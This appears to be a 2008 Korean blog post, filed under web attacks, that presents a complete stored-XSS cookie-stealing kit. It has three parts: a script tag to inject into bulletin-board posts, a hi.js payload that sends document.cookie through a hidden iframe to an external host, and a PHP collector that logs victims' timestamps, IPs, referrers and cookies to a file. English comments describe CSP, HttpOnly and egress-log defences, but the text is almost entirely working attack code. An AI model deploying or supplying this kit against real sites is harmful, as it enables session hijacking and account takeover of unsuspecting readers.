Merry Christmas

XSS Code

웹/공격 2008. 11. 18. 10:04 |

 게시판 게시글에 삽입되는 XSS 코드 (저장형 XSS)
---------------------------------------------------------
<!-- Stored XSS example: if the board renders post bodies without HTML-encoding them, this tag makes each reader's browser fetch hi.js from a third-party host and run it in the context of the board page. Defence: encode user-supplied content on output and restrict script sources with a Content-Security-Policy (script-src). -->
<script src="http://test.com/hi.js"></script>
---------------------------------------------------------

hi.js
---------------------------------------------------------
// Runs in the context of the page that included this script. It writes a zero-sized
// (width=0 height=0) iframe whose URL carries document.cookie in the "coo" query
// parameter, so the cookie string leaves the browser as part of a request to hi.php.
// Defender notes: cookies set with the HttpOnly attribute are not visible to
// document.cookie, and a Content-Security-Policy limiting script-src / frame-src
// blocks both the external script and the iframe load. In proxy or egress logs this
// shows up as a GET to an unrelated host whose query string holds cookie names and values.
document.write("<iframe src='http://test.com/hi.php?coo="+document.cookie+"' width=0 height=0></iframe>");
---------------------------------------------------------

hi.php
{
}
---------------------------------------------------------
<?
// Collector side of the example: each request appends one record to ./cookie1.txt.
// Nothing in this script contacts the site where the post was injected, so that
// site's own access logs would not show this request; client-side egress/proxy
// logs (and CSP violation reports, if a policy is deployed) are where it is visible.

// "coo" is the query parameter that hi.js fills with document.cookie.
$coo=$_GET['coo'];

// The mode string starts with "a", so records are appended to the existing file.
$fp=fopen("./cookie1.txt", "a++");

// Record layout: timestamp, client address, Referer header, cookie string,
// followed by blank lines that separate one record from the next.
fputs($fp, "date: ".date("Y-m-d H:i:s",time()));
fputs($fp, "\n");
// REMOTE_ADDR is the address the request arrived from (the browser, or a proxy in front of it).
fputs($fp, "ip: ".$_SERVER['REMOTE_ADDR']);
fputs($fp, "\n");
// The Referer header, when the browser sends one, presumably names the page that
// embedded the iframe, i.e. the page where the injected post was rendered.
fputs($fp, "HTTP_REFFERER: ".$_SERVER['HTTP_REFERER']);
fputs($fp, "\n");
// The value logged here is only what document.cookie exposed; HttpOnly cookies never reach it.
fputs($fp, "cookie: $coo");
fputs($fp, "\n");
fputs($fp, "\n");
fputs($fp, "\n");

fclose($fp);
?>
----------------------------------------------------
